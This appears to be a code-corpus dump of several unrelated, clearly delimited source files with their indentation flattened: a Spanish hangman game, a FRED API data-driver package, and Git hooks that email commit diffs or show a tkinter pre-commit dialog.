'csharp clojure coffescript crystal '\
'dart delphi '\
'fortran '\
'go '\
'haskell '\
'java javascript '\
'python typescriptt robotscript rinfo rust'.split()
}
def clear_console():
os.system('cls')
def getRandomWord():
# First, randomly select a key from the dictionary:
key = random.choice(list(WORDS_DICT.keys()))
# Second, randomly select a word from the key's list in the dictionary:
wordIndex = random.randint(0, len(WORDS_DICT[key]) - 1)
return [key, WORDS_DICT[key][wordIndex]]
def displayBoard(missed_letters, correct_letters, secret_word, frame):
level = len(missed_letters)
if level > 0:
update = FRAMES['levels'][level-1]
for key in update.keys():
frame[key] = update[key]
for line in frame:
print(line)
print('Letras erroneas:', end=' ')
for letter in missed_letters:
print(letter, end=' ')
print()
blanks = '_' * len(secret_word)
for i in range(len(secret_word)): # replace blanks with correctly guessed letters
if secret_word[i] in correct_letters:
blanks = blanks[:i] + secret_word[i] + blanks[i+1:]
for letter in blanks: # show the secret word with spaces in between each letter
print(letter, end=' ')
print()
def getGuess(already_guessed):
while True:
guess = input('Letra: ').lower()
if len(guess) != 1:
print('Se pidio una letra, intenta nuevamente')
elif guess in already_guessed:
print('Ya dijiste esa letra, intenta nuevamente')
elif guess not in 'abcdefghijklmnopqrstuvwxyz':
print('Se pidio una letra, intenta nuevamente')
else:
return guess
def get_difficulty():
clear_console()
difficulty = ' '
while difficulty not in 'FMD':
print('Ingrese dificultad:\n F - Facil\n M - Medio\n D - Dificil\n')
difficulty = input('Opcion: ').upper()
return difficulty
def play_again():
answer = input('\nQueres jugar de nuevo?\n Si | No\nOpcion: ')
return answer.lower().startswith('s')
def show_menu():
print(
'EL AHORCADO\n\n'\
'Ahora si vamos a jugar\n'\
'Elija una opcion:\n'\
' J - Jugar\n'\
' S - Salir\n'\
)
answer = input('Opcion: ').lower()
while answer not in 'jugarsalir':
print(f'{answer} no es una respuesta valida, intente denuevo')
answer = input('Opcion: ').lower()
return answer in 'jugar'
def reset(difficulty):
missed_letters = ''
correct_letters = ''
secret_set, secret_word = getRandomWord()
match difficulty:
case 'F':
correct_letters = secret_word[random.randrange(len(secret_word))]
correct_letters += secret_word[random.randrange(len(secret_word))]
case 'M':
correct_letters = secret_word[random.randrange(len(secret_word))]
frame = list(FRAMES['base'])
return [missed_letters, correct_letters, secret_set, secret_word, frame]
def develop_game(missed_letters, correct_letters, secret_set, secret_word, frame):
game_done = False
while not game_done:
clear_console()
print('El tipo de la palabra es: ' + secret_set)
displayBoard(missed_letters, correct_letters, secret_word, frame)
# Let the player type in a letter.
guess = getGuess(missed_letters + correct_letters)
if guess in secret_word:
correct_letters = correct_letters + guess
# Check if the player has won
found_all_letters = True
for i in range(len(secret_word)):
if secret_word[i] not in correct_letters:
found_all_letters = False
break
if found_all_letters:
clear_console()
print(FRAMES['win'])
print('\nSi!\nLa palabra secreta era: "' + secret_word + '"!\nGanaste')
game_done = True
else:
missed_letters = missed_letters + guess
# Check if player has guessed too many times and lost.
if len(missed_letters) == 6:
clear_console()
print(FRAMES['loose'])
print('Te quedaste sin intentos!\nDespues de ' + str(len(missed_letters)) + ' fallos y ' + str(len(correct_letters)) + ' correctas adivinanzas,\nla palabra era "' + secret_word + '"')
game_done = True
def app():
play = show_menu()
while play:
difficulty = get_difficulty()
missed_letters, correct_letters, secret_set, secret_word, frame = reset(difficulty)
develop_game(missed_letters, correct_letters, secret_set, secret_word, frame)
play = play_again()
app()
clear_console()
print('EL AHORCADO\n\nGracias por jugar <3')
``` |
{
"source": "jjotterson/beafullfetchpy",
"score": 2
} |
#### File: datapungibea/tests/main.py
```python
import subprocess
import os
from datapungibea.utils import getUserSettings
def runTests(outputPath='',testsPath='',verbose = True):
if not testsPath:
testsPath = os.path.dirname(os.path.abspath(__file__)).replace("\\","/")
print('**************************** \nWill run tests in: ' + testsPath)
if not outputPath:
outputPath = "U:/"
try:
settingsFile = getUserSettings()
outputPath = settingsFile['TestsOutputPath']
except:
print("Could not load TestOutputPath from user settings. Perhaps run util.setTestFolder( FilePath ) ")
subprocess.Popen('pytest ' + testsPath + ' --html='+outputPath+'datapungibea_Tests.html --self-contained-html')
if verbose:
print('Tests will be saved in '+outputPath+'datapungibea_Tests.html \n****************************')
if __name__ == '__main__':
from sys import argv
import subprocess
import os
runTests()
#print(os.path.dirname(os.path.realpath(__file__)))
#query = subprocess.Popen('pytest --html=datapungibea_Tests.html')
#print(query)
``` |
{
"source": "jjotterson/datapungi_fed",
"score": 2
} |
#### File: datapungi_fed/datapungi_fed/driverCore.py
```python
import pandas as pd
import requests
import json
from copy import deepcopy
import pyperclip
import math
import re
import inspect
import yaml
import itertools
from datetime import datetime
import warnings
import functools
from textwrap import dedent
from datapungi_fed import generalSettings #NOTE: projectName
#import generalSettings #NOTE: projectName
from datapungi_fed import utils #NOTE: projectName
#import utils #NOTE: projectName
class driverCore():
r'''
Given a dbGroupName and its default db, starts a factory of query functions - ie, a function for
each db in the group. If dbGroupName is empty, return the list of dbGroups, dbs in the group, and their parameters
'''
def __init__(self,dbGroupName='', baseRequest={},connectionParameters={},userSettings={}):
#TODO: place defaultQueryFactoryEntry in yaml
self._dbParams, self.defaultQueryFactoryEntry = self._getDBParameters(dbGroupName)
self._ETDB = extractTransformDB(baseRequest,connectionParameters,userSettings) #a generic query is started
self._ETFactory = extractTransformFactory(dbGroupName,self._ETDB,self._dbParams,self.defaultQueryFactoryEntry)
self._driverMeta = driverMetadata()(dbGroupName)
self.__setdoc__(dbGroupName)
def __getitem__(self,dbName):
return(self._ETFactory.extractTransformFactory[dbName])
def __call__(self,*args,**kwargs):
out = self._ETFactory.extractTransformFactory[self.defaultQueryFactoryEntry](*args,**kwargs)
return(out)
def __setdoc__(self,dbGroupName):
if dbGroupName == '':
self.__doc__ = 'Returns the metadata of the dataset groups and their databases. Do not need inputs.'
else:
self.__doc__ = 'Queries the databases of {} \n \n'.format(dbGroupName)
for entry in self.__docParams__:
self.__doc__ += '- {short name}: {description} \n'.format(**entry)
self.__doc__ += ' parameters: {}\n'.format(str(entry['parameters']))
self.__doc__ += ' official database name: {}\n'.format(entry['database'])
self.__doc__ += '\nDefault query database: {}\n'.format(self.defaultQueryFactoryEntry)
self.__doc__ += "Sample functions: \n-data.{dbGroupName}() (default) \n-data.{dbGroupName}['{db}']() (query the {db} database)".format(**{'dbGroupName':dbGroupName.lower(),'db':self.defaultQueryFactoryEntry})
self.__doc__ += "\n\nNOTE: don't need to pass most parameters. Eg, api_key and file_type (json)."
def __str__(self):
return(self.__doc__)
def _getDBParameters(self,dbGroupName = ''):
r'''
The parameters of each database in the group (if empty returns all groups x databases)
'''
dataPath = utils.getResourcePath('/config/datasetlist.yaml')
with open(dataPath, 'r') as yf:
datasetlist = yaml.safe_load(yf)
if dbGroupName == '':
defaultDB = {}
return((datasetlist,defaultDB))
#get the entry of the group:
selected = list(filter( lambda x: x['group'] == dbGroupName , datasetlist))[0]
defaultDB = selected.get('default query','')
datasets = selected.get('datasets',{})
removeCases = lambda array: list(filter( lambda x: x not in ['api_key','file_type'] , array ))
dbParams = { entry['short name'] : { 'urlSuffix' : entry['database'] , 'json key': entry['json key'], 'params': removeCases(entry['parameters']) } for entry in datasets }
self.__docParams__ = datasets #parameters used to write a doc string for the class instance.
return((dbParams,defaultDB))
class extractTransformFactory():
r'''
given a groupName of databases, constructs dictionary of functions querying all of its databases
'''
def __init__(self,dbGroupName,ETDB,dbParams,defaultQueryFactoryEntry):
if dbGroupName:
self.dbGroupName = dbGroupName
self.dbParams = dbParams
self.ETDB = ETDB
self.ETDB(self.dbGroupName,self.dbParams) #update the connector to the databases with parameters specific to the collection of dbs.
self.extractTransformFactory = { dbName : self.selectDBQuery(self.query, dbName) for dbName in self.dbParams.keys() }
self.defaultQueryFactoryEntry = defaultQueryFactoryEntry #the entry in query factory that __call__ will use.
else:
self.extractTransformFactory = {}
def query(self,*args,**kwargs):
return( self.ETDB.query(*args,**kwargs) )
def selectDBQuery(self,queryFun,dbName):
r'''
Fix a generic query to a query to dbName, creates a lambda that, from
args/kwargs creates a query of the dbName
'''
fun = functools.partial(queryFun,dbName)
lfun = lambda *args,**kwargs: fun(**self.getQueryArgs(dbName,*args,**kwargs))
#add quick user tips
lfun.options = self.dbParams[dbName]['params']
return(lfun)
def getQueryArgs(self,dbName,*args,**kwargs):
r'''
Map args and kwargs to driver args
'''
#paramaters to be passed to a requests query:
paramArray = self.dbParams[dbName]['params']
params = dict(zip(paramArray,args))
paramsAdd = {key:val for key, val in kwargs.items() if key in paramArray}
params.update(paramsAdd)
#non query options (eg, verbose)
otherArgs = {key:val for key, val in kwargs.items() if not key in paramArray}
return({**{'params':params},**otherArgs})
class extractTransformDB():
r'''
Functions to connect and query a db given its dbName and dbParams (see yaml in config for these).
'''
def __init__(self,baseRequest={},connectionParameters={},userSettings={}):
'''
loads generic parametes (ie api key, location fo data.)
'''
self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
self._baseRequest = self.getBaseRequest(baseRequest,connectionParameters,userSettings)
self._lastLoad = {} #data stored here to assist functions such as clipcode
self._transformData = transformExtractedData()
self._getCode = transformIncludeCodeSnippet()
self._cleanCode = "" #TODO: improvable - this is the code snippet producing a pandas df
def __call__(self,dbGroup,dbParams):
r'''
A call to an instance of the class Loads specific parameters of the dbs of dbGroup
'''
self.dbGroup = dbGroup
self.dbParams = dbParams
def query(self,dbName,params={},file_type='json',verbose=False,warningsOn=True):
r'''
Args:
params
file_type
verbose
warningsOn
'''
# get requests' query inputs
warningsList = ['countPassLimit'] # warn on this events.
prefixUrl = self.dbParams[dbName]['urlSuffix']
output = self.queryApiCleanOutput(prefixUrl, dbName, params, warningsList, warningsOn, verbose)
return(output)
def queryApiCleanOutput(self,urlPrefix,dbName,params,warningsList,warningsOn,verbose):
r'''
Core steps of querying and cleaning data. Notice, specific data cleaning should be
implemented in the specific driver classes
Args:
self - should containg a base request (url)
urlPrefix (str) - a string to be appended to request url (eg, https:// ...// -> https//...//urlPrefix?)
params (dict) - usually empty, override any query params with the entries of this dictionary
warningsList (list) - the list of events that can lead to warnings
warningsOn (bool) - turn on/off driver warnings
verbose (bool) - detailed output or short output
'''
#get data
query = self.getBaseQuery(urlPrefix,params)
retrivedData = requests.get(** { key:entry for key, entry in query.items() if key in ['params','url'] } )
#clean data
df_output,self._cleanCode = self.cleanOutput(dbName,query,retrivedData)
#print warning if there is more data the limit to download
for entry in warningsList:
self._warnings(entry,retrivedData,warningsOn)
#short or detailed output, update _lastLoad attribute:
output = self.formatOutputupdateLoadedAttrib(query,df_output,retrivedData,verbose)
return(output)
def getBaseQuery(self,urlPrefix,params):
r'''
Return a dictionary of request arguments.
Args:
urlPrefix (str) - string appended to the end of the core url (eg, series -> http:...\series? )
dbName (str) - the name of the db being queried
params (dict) - a dictionary with request paramters used to override all other given parameters
Returns:
query (dict) - a dictionary with 'url' and 'params' (a string) to be passed to a request
'''
query = deepcopy(self._baseRequest)
#update query url
query['url'] = query['url']+urlPrefix
query['params'].update(params)
query['params_dict'] = query['params']
query['params'] = '&'.join([str(entry[0]) + "=" + str(entry[1]) for entry in query['params'].items()])
return(query)
def formatOutputupdateLoadedAttrib(self,query,df_output,retrivedData,verbose):
if verbose == False:
self._lastLoad = df_output
return(df_output)
else:
code = self._getCode.transformIncludeCodeSnippet(query,self._baseRequest,self._connectionInfo.userSettings,self._cleanCode)
output = dict(dataFrame = df_output, request = retrivedData, code = code)
self._lastLoad = output
return(output)
def cleanOutput(self,dbName,query,retrivedData):
r'''
This is a placeholder - specific drivers should have their own cleaning method
this generates self._cleanCode
'''
transformedOutput = self._transformData(self.dbGroup,dbName,self.dbParams,query,retrivedData)
return(transformedOutput)
def getBaseRequest(self,baseRequest={},connectionParameters={},userSettings={}):
r'''
Write a base request. This is the information that gets used in most requests such as getting the userKey
'''
if baseRequest =={}:
connectInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
return(connectInfo.baseRequest)
else:
return(baseRequest)
def _warnings(self,warningName,inputs,warningsOn = True):
if not warningsOn:
return
if warningName == 'countPassLimit':
'''
warns if number of lines in database exceeds the number that can be downloaded.
inputs = a request result of a FED API
'''
_count = inputs.json().get('count',1)
_limit = inputs.json().get('limit',1000)
if _count > _limit:
warningText = 'NOTICE: dataset exceeds download limit! Check - count ({}) and limit ({})'.format(_count,_limit)
warnings.warn(warningText)
class transformExtractedData():
def __call__(self,dbGroup,dbName,dbParams,query,retrivedData):
if dbGroup == 'Series':
return( self.cleanOutputSeries(dbName,dbParams,query,retrivedData) )
if dbGroup == 'Geo':
return( self.cleanOutputGeo(dbName,dbParams,query,retrivedData) )
else:
return( self.cleanOutput(dbName,dbParams,query,retrivedData) )
def cleanOutput(self, dbName, dbParams,query, retrivedData): #categories, releases, sources, tags
dataKey = dbParams[dbName]['json key']
cleanCode = "df_output = pd.DataFrame( retrivedData.json()['{}'] )".format(dataKey)
df_output = pd.DataFrame(retrivedData.json()[dataKey]) # TODO: deal with xml
warnings.filterwarnings("ignore", category=UserWarning)
setattr(df_output, '_meta', dict(filter(lambda entry: entry[0] != dataKey, retrivedData.json().items())))
warnings.filterwarnings("always", category=UserWarning)
return((df_output,cleanCode))
def cleanOutputSeries(self, dbName, dbParams,query, retrivedData): #series
dataKey = dbParams[dbName]['json key']
cleanCode = "df_output = pd.DataFrame( retrivedData.json()['{}'] )".format(dataKey)
df_output = pd.DataFrame(retrivedData.json()[dataKey]) # TODO: deal with xml
if dbName == 'observations':
seriesID = query['params_dict']['series_id'] #{ x.split('=')[0] : x.split('=')[1] for x in query['params'].split("&") }['series_id']
df_output = (df_output[['date','value']]
.assign( dropRow = lambda df: pd.to_numeric(df['value'],errors='coerce') )
.dropna()
.drop('dropRow',axis=1)
.assign(value=lambda df: df['value'].astype('float'), date=lambda df: pd.to_datetime(df['date'] ) )
.set_index('date')
.rename({'value':seriesID},axis='columns'))
codeAddendum = f'''\n
df_output = (df_output[['date','value']]
.assign( dropRow = lambda df: pd.to_numeric(df['value'],errors='coerce') )
.dropna()
.drop('dropRow',axis=1)
.assign(value=lambda df: df['value'].astype('float'), date=lambda df: pd.to_datetime(df['date'] ) )
.set_index('date')
.rename({{'value': '{seriesID}' }},axis='columns'))
'''
cleanCode += dedent(codeAddendum)
#TODO: relabel value column with symbol
warnings.filterwarnings("ignore", category=UserWarning)
setattr(df_output, '_meta', dict(filter(lambda entry: entry[0] != dataKey, retrivedData.json().items())))
warnings.filterwarnings("always", category=UserWarning)
return((df_output,cleanCode))
def cleanOutputGeo(self, dbName, dbParams,query, retrivedData): #categories, releases, sources, tags
if dbName == 'shapes':
dataKey = query['params_dict']['shape']
elif dbName == 'series' or dbName == 'data':
#reproducible code
cleanCode = "includeDate = lambda key, array: [ dict(**entry,**{'_date':key}) for entry in array ]"
cleanCode += "\ndictData = [ includeDate(key,array) for key,array in retrivedData.json()['meta']['data'].items() ]"
cleanCode += "\ndictDataFlat = [item for sublist in dictData for item in sublist]"
cleanCode += "\ndf_output = pd.DataFrame( dictDataFlat )"
#create dataframe
includeDate = lambda key, array: [ dict(**entry,**{'_date':key}) for entry in array ]
dictData = [ includeDate(key,array) for key,array in retrivedData.json()['meta']['data'].items() ]
dictDataFlat = [item for sublist in dictData for item in sublist]
df_output = pd.DataFrame( dictDataFlat )
#dataframe metadata
jsonMeta = retrivedData.json()['meta']
warnings.filterwarnings("ignore", category=UserWarning)
setattr(df_output, '_meta', dict(filter(lambda entry: entry[0] != 'data', jsonMeta.items())))
warnings.filterwarnings("always", category=UserWarning)
return((df_output,cleanCode))
else:
dataKey = dbParams[dbName]['json key']
cleanCode = "df_output = pd.DataFrame( retrivedData.json()['{}'] )".format(dataKey)
df_output = pd.DataFrame(retrivedData.json()[dataKey]) # TODO: deal with xml
warnings.filterwarnings("ignore", category=UserWarning)
setattr(df_output, '_meta', dict(filter(lambda entry: entry[0] != dataKey, retrivedData.json().items())))
warnings.filterwarnings("always", category=UserWarning)
return((df_output,cleanCode))
class transformIncludeCodeSnippet():
def transformIncludeCodeSnippet(self,query,baseRequest,userSettings={},pandasCode=""):
#load code header - get keys
apiCode = self.getApiCode(query,userSettings)
#load request's code
queryCode = self.getQueryCode(query,baseRequest,pandasCode)
return(apiCode + queryCode)
def getQueryCode(self,query,baseRequest,pandasCode=""):
queryClean = {'url':query['url'],'params':query['params']} #passing only these two entries of query; params_dict is dropped.
queryClean['url'] = 'url'
queryClean['params']=queryClean['params'].replace(baseRequest['params']['api_key'],'{}')+'.format(key)' #replace explicit api key by the var "key" poiting to it.
queryCode = '''\
query = {}
retrivedData = requests.get(**query)
{} #replace json by xml if this is the request format
'''
queryCode = dedent(queryCode).format(json.dumps(queryClean),pandasCode)
queryCode = queryCode.replace('"url": "url"', '"url": url')
queryCode = queryCode.replace('.format(key)"', '".format(key)')
queryCode = queryCode.replace('"UserID": "key"', '"UserID": key') #TODO: need to handle generic case, UserID, api_key...
return(queryCode)
def getApiCode(self,query,userSettings):
r'''
The base format of a code that can be used to replicate a driver using Requests directly.
'''
try:
url = query['url']
if userSettings:
apiKeyPath = userSettings['ApiKeysPath']
apiKeyLabel = userSettings["ApiKeyLabel"]
else:
userSettings = generalSettings.getGeneralSettings( ).userSettings['ApiKeysPath']
apiKeyPath = userSettings['ApiKeysPath']
apiKeyLabel = userSettings["ApiKeyLabel"]
except:
url = " incomplete connection information "
apiKeyPath = " incomplete connection information "
#userSettings = utils.getUserSettings()
#pkgConfig = utils.getPkgConfig()
storagePref = apiKeyPath.split('.')[-1]
passToCode = {'ApiKeyLabel': apiKeyLabel, "url":url, 'ApiKeysPath':apiKeyPath} #userSettings["ApiKeyLabel"]
code = self.apiCodeOptions(storagePref)
code = code.format(**passToCode)
return(code)
def apiCodeOptions(self,storagePref):
r''''
storagePref: yaml, json, env
'''
if storagePref == 'yaml':
code = '''\
import requests
import yaml
import pandas as pd
apiKeysFile = '{ApiKeysPath}'
with open(apiKeysFile, 'r') as stream:
apiInfo= yaml.safe_load(stream)
url,key = apiInfo['{ApiKeyLabel}']['url'], apiInfo['{ApiKeyLabel}']['key']
'''
elif storagePref == 'json':
code = '''\
import requests
import json
import pandas as pd
# json file should contain: {"BEA":{"key":"YOUR KEY","url": "{url}" }
apiKeysFile = '{ApiKeysPath}'
with open(apiKeysFile) as jsonFile:
apiInfo = json.load(jsonFile)
url,key = apiInfo['{ApiKeyLabel}']['url'], apiInfo['{ApiKeyLabel}']['key']
'''
else: #default to env
code = '''\
import requests
import os
import pandas as pd
url = "{url}"
key = os.getenv("{ApiKeyLabel}")
'''
return(dedent(code))
def clipcode(self):
r'''
Copy the string to the user's clipboard (windows only)
'''
try:
pyperclip.copy(self._lastLoad['code'])
except:
print("Loaded session does not have a code entry. Re-run with verbose option set to True. eg: v.drivername(...,verbose=True)")
class driverMetadata():
def __call__(self,dbGroup):
if dbGroup == 'Categories':
self.metadata = [{
"displayName": "tags",
# Name of driver main function - run with getattr(data,'datasetlist')()
"method": "tags",
"params": {'file_type': 'json', 'realtime_start': '', 'realtime_end': '', 'tag_names': '', 'exclude_tag_names': '', 'tag_group_id': '', 'search_text': '', 'limit': '', 'offset': '', 'order_by': '', 'sort_order': ''},
}]
elif dbGroup == 'Releases':
self.metadata = [{
"displayName": "tags",
# Name of driver main function - run with getattr(data,'datasetlist')()
"method": "tags",
"params": {'file_type': 'json', 'realtime_start': '', 'realtime_end': '', 'tag_names': '', 'exclude_tag_names': '', 'tag_group_id': '', 'search_text': '', 'limit': '', 'offset': '', 'order_by': '', 'sort_order': ''},
}]
elif dbGroup == 'Series':
self.metadata = [{
"displayName": "tags",
# Name of driver main function - run with getattr(data,'datasetlist')()
"method": "tags",
"params": {'file_type': 'json', 'realtime_start': '', 'realtime_end': '', 'tag_names': '', 'exclude_tag_names': '', 'tag_group_id': '', 'search_text': '', 'limit': '', 'offset': '', 'order_by': '', 'sort_order': ''},
}]
elif dbGroup == 'Sources':
self.metadata = [{
"displayName": "tags",
# Name of driver main function - run with getattr(data,'datasetlist')()
"method": "tags",
"params": {'file_type': 'json', 'realtime_start': '', 'realtime_end': '', 'tag_names': '', 'exclude_tag_names': '', 'tag_group_id': '', 'search_text': '', 'limit': '', 'offset': '', 'order_by': '', 'sort_order': ''},
}]
elif dbGroup == 'Tags':
self.metadata = [{
"displayName": "tags",
# Name of driver main function - run with getattr(data,'datasetlist')()
"method": "tags",
"params": {'file_type': 'json', 'realtime_start': '', 'realtime_end': '', 'tag_names': '', 'exclude_tag_names': '', 'tag_group_id': '', 'search_text': '', 'limit': '', 'offset': '', 'order_by': '', 'sort_order': ''},
}]
else:
self.metadata = [{
"displayName": "datasetlist",
# Name of driver main function - run with getattr(data,'datasetlist')()
"method": "datasetlist",
"params": {'file_type': 'json', 'realtime_start': '', 'realtime_end': '', 'tag_names': '', 'exclude_tag_names': '', 'tag_group_id': '', 'search_text': '', 'limit': '', 'offset': '', 'order_by': '', 'sort_order': ''},
}]
return(self.metadata)
if __name__ == '__main__':
case = driverCore(dbGroupName = 'Series')
print(case('gdp',verbose=True))
```
#### File: datapungi_fed/datapungi_fed/drivers.py
```python
import pandas as pd
import requests
import json
from copy import deepcopy
import pyperclip
import math
import re
import inspect
import yaml
import itertools
import warnings
from datetime import datetime
from datapungi_fed import generalSettings # NOTE: projectName
#import generalSettings #NOTE: projectName
from datapungi_fed import utils # NOTE: projectName
#import utils #NOTE: projectName
from datapungi_fed.driverCore import driverCore
#from driverCore import driverCore
class datasetlist(driverCore):
def _query(self):
'''
Returns name of available datasets, a short description and their query parameters.
Args:
none
Output:
- pandas table with query function name, database name, short description and query parameters.
'''
#get all dictionary of all drivers (in config/datasetlist.yaml)
datasetlist = self._dbParams
datasetlistExp = [[{**entry, **dataset}
for dataset in entry.pop('datasets')] for entry in datasetlist]
datasetlistFlat = list(itertools.chain.from_iterable(
datasetlistExp)) # flatten the array of array
df_output = pd.DataFrame(datasetlistFlat)
return(df_output)
def __call__(self):
return(self._query())
if __name__ == '__main__':
d = datasetlist()
v = d(); print(v)
``` |
{
"source": "jjotterson/git-repo-hooks",
"score": 3
} |
#### File: jjotterson/git-repo-hooks/post-commit.py
```python
import sys
import os
import win32com.client as win32
import subprocess
import re
import html
import webbrowser
#import tempfile #TODO: include attachment to the email else save as
class CommitEmail():
"""
Produces an email from the lastest git commit. If exists, takes as input two files:
.git/hooks/hooks.approvallist
.git/hooks/hooks.mailinglist
that contain the list of approvers and other people that should get the email. Else,
starts an email without a recipient list.
"""
def __init__(self):
self.getrawdata()
#
def getrawdata(self):
self.raw = {}
# get email addresses to send message to (re-write as hookconfig file)
with open('.git/hooks/hooks.mailinglist', 'a+') as maillist, open('.git/hooks/hooks.approvallist', 'a+') as approvallist:
maillist.seek(0)
approvallist.seek(0)
self.raw['notify'] = maillist.read()
self.raw['request'] = approvallist.read()
#
#local and remote paths
# making easier for browsers other than Chrome to open (Firefox and Explorer, need to check Firefox)
self.raw['localPath'] = "file:///"+os.getcwd().replace('\\', '/')+"/"
remotePathCode = subprocess.Popen('git config --get remote.origin.url', stdout=subprocess.PIPE)
self.raw['remotePath'] = remotePathCode.stdout.read().decode('utf-8', 'replace').strip()
#
# get commit history:
LastCommit = subprocess.Popen('git log -p -1', stdout=subprocess.PIPE)
self.raw['diffLog'] = LastCommit.stdout.read().decode('utf-8', 'replace').strip()
#
return self.raw
#
def HTMLLineformat(self,codeLine,divIndex,stl = {}):
"""
transforms a line of the git diff in a line of HTML code
TODO: close the <li>
"""
output = codeLine
#
# Style options
if stl == {}:
stl['codeDivBackgroundColor'] = 'lightgrey'
stl['codeDivFontFamily'] = 'Consolas'
stl['codeDivDefaultFontColor'] = 'rgb(90, 90, 90)'
stl['codeDivStyle'] = '"background-color:{0};font-family:{1};color:{2};max-height:409px;overflow:auto;"'.format(
stl['codeDivBackgroundColor'], stl['codeDivFontFamily'], stl['codeDivDefaultFontColor'])
stl['atColor'] = '"Dodgerblue"' # '""' defaults to div font color.
stl['removedCodeColor'] = '"red"' # '"900C3F"'
stl['newCodeColor'] = '"green"'
stl['headColor'] = '"black"'
stl['linkColor'] = '"Dodgerblue"'
#
#
# note, divIndex starts at 0, after first @@ it becomes 1.
if output.startswith('--- a/'):
output = ''
if output.startswith('+++ b/'):
output = ''
if output.startswith('+'):
output = '<font color = ' + stl['newCodeColor'] + '>' + output + '</font>'
#
if output.startswith('-'):
output = '<font color = ' + stl['removedCodeColor'] + '>' + output + '</font>'
#
if output.startswith('@'):
# always start a div (of block code)
output = '<font color = ' + stl['atColor'] + '>' + output + '</font>'
if divIndex == 0:
output = '<div style=' + stl['codeDivStyle'] + '>' + output
divIndex = 1
# note, will put a link to the file location
if output.startswith('diff --git'):
output = output.replace('diff --git', '')
# strip removes whitespaces
output = re.sub(r'a/.(.*?)b/', '', output).strip()
# file locations:
localFileRepoLink = '<a href = "{0}" style = "color:Gray">Local File</a>'.format(
self.raw['localPath'] + output)
if self.raw['remotePath'] != '/':
remoteFileRepoLink = ', <a href = "{0}" style = "color:Gray">Remote File</a>'.format(
self.raw['remotePath'] + output)
else:
remoteFileRepoLink = ''
if divIndex == 0:
output = '<br><br><li> <em><font color = ' + stl['headColor'] + \
' size = 4> File Changed: ' + output + '</font></em>'
else:
output = '</div><br><br><li> <em><font color = ' + stl['headColor'] + \
' size = 4> File Changed: ' + output + '</font></em>'
divIndex = (divIndex + 1) % 2
# include link to file
output = output + \
'<br>[ {0} {1} ]'.format(localFileRepoLink, remoteFileRepoLink)
return [output, divIndex]
#
def gitdiffToHTML(self):
"""
transform git diff log into HTML
TODO:once started html (html.escape) should make sure it is always htlm
"""
diffLog = self.raw['diffLog'].replace('\r', '').split('\n')
divIndex = 0
diffHTML = []
for x in diffLog:
output, divIndex = self.HTMLLineformat(html.escape(x), divIndex)
diffHTML.append(output)
#
diffHTML.insert(3, 'Local Path: <a href = "{0}" style = "color:Gray">'.format(
self.raw['localPath']) + self.raw['localPath'] + '</a>')
if self.raw['remotePath'] != '/':
diffHTML.insert(4, 'Remote Path: <a href = "{0}" style = "color:Gray">'.format(
self.raw['remotePath']) + self.raw['remotePath'] + '</a>')
#fix the ending of the HTML file
endDiv = ''
if divIndex == 1:
divIndex = 0
endDiv = '</div>'
#
diffHTML = '<ol>' + '<br>'.join(diffHTML) + endDiv + '</ol>'
#
# cosmetic - assure code is closer by a line to its filename block than to the next filename block
diffHTML = diffHTML.replace('<br><br><br><div', '<br><br><div')
#
return diffHTML
#
def Email(self,mailserver,send=0):
"""
Start an email or send it.
if no server is provided, open the html.
TODO: include the output as attachement, include other email (smtp)
"""
if mailserver == 'outlook':
#Start email ##################################
os.startfile("outlook")
outlook = win32.Dispatch('outlook.application')
#
#start mail
mail = outlook.CreateItem(0)
#
#recipients
all = self.raw['notify']+";"+self.raw['request']
all = ";".join(list(set(all.split(";"))))
mail.To = all
#
mail.Subject = '[[Committed Code Summary]]'
mail.HtmlBody = self.gitdiffToHTML()
#
#attachment = tempfile.NamedTemporaryFile( mode = 'w+t', suffix = '.txt')
# attachment.writelines(diffHTML)
#mail.Attachments.Add(Source = attachment.name)
#
if send == 0:
mail.Display(True)
else:
mail.send()
else:
html = '<html>' + self.gitdiffToHTML() +'</html>'
path = os.path.abspath('temp.html')
url = 'file://' + path
with open(path, 'w') as f:
f.write(html)
webbrowser.open(url)
print("\n", "****** Starting Post-Commit Hook ******")
CommitEmail().Email('outlook', send = 0 )
print("****** End of Post-Commit Hook ******", "\n")
```
#### File: jjotterson/git-repo-hooks/pre-commit.py
```python
import sys
import os
import subprocess
print("\n", "****** Pre-Commit Hook ******")
print( str(sys.argv))
#print( os.path.abspath(__file__) )
#v = sys.stdin.read().split()
#proc = subprocess.Popen(["git", "rev-list", "--oneline","--first-parent" , "%s..%s" %(old, new)], stdout=subprocess.PIPE)
#commitMessage=str(proc.stdout.readlines()[0])
#sys.stdin = open("CON", "r")
#rr = input('enter something: ')
##proc = Popen(h, stdin=sys.stdin)
#
#
#lintit = input('Commit anyway? [N/y] ')
#
#print(lintit)
#
#print('end of pre-commit')
#from tkinter import *
#
#window = Tk()
#
#window.title("Welcome to LikeGeeks app")
#
#window.mainloop()
import tkinter as tk
class Application(tk.Frame):
def __init__(self, master=None):
super().__init__(master)
self.fontsel = "Times"
self.Appconfigs()
#self.create_widgets()
self.MainContainers()
self.TopFrame()
self.SummaryFrame()
self.TestFrame()
self.DiffFrame()
def Appconfigs(self,title="Repo Pre-Commit Policy"):
self.master.title(title)
#self.master.option_add('*Font','Times')
#root.geometry('{}x{}'.format(950, 600))
def MainContainers(self):
#Main containers
self.frametop = tk.Frame(root,width=400, height=50, pady=3,padx = 1, bd=2, relief=tk.RIDGE)
self.framesum = tk.Frame(root,width=400, height=50, pady=3,padx = 1, bd=2, relief=tk.RIDGE)
self.frametest = tk.Frame(root,width=400, height=50, pady=3,padx = 1, bd=2, relief=tk.RIDGE)
self.framediff = tk.Frame(root,width=400, height=50, pady=3,padx = 1, bd=2, relief=tk.RIDGE)
#layout of the main containers
#root.grid_rowconfigure(1, weight=1)
#root.grid_columnconfigure(0, weight=1)
self.frametop.grid(row=0, sticky ="ew")
self.framesum.grid(row=1, sticky ="ew")
self.frametest.grid(row=2, sticky="ew")
self.framediff.grid(row=3, sticky="ew")
def TopFrame(self):
#top frame widgets
#
#Geometry
self.top_left = tk.Frame(self.frametop, width=550, height=190)
self.top_right = tk.Frame(self.frametop, width=550, height=190, padx=50, pady=3)
self.top_left.grid(row=0, column=0, sticky="ns")
self.top_right.grid(row=0, column=1, sticky="ns")
#
#Content
tk.Label(self.top_left, text="Pre-Commit Summary", font=(self.fontsel, 20), anchor = tk.W, justify = tk.LEFT, ).grid(row=0, column=0, sticky='e')
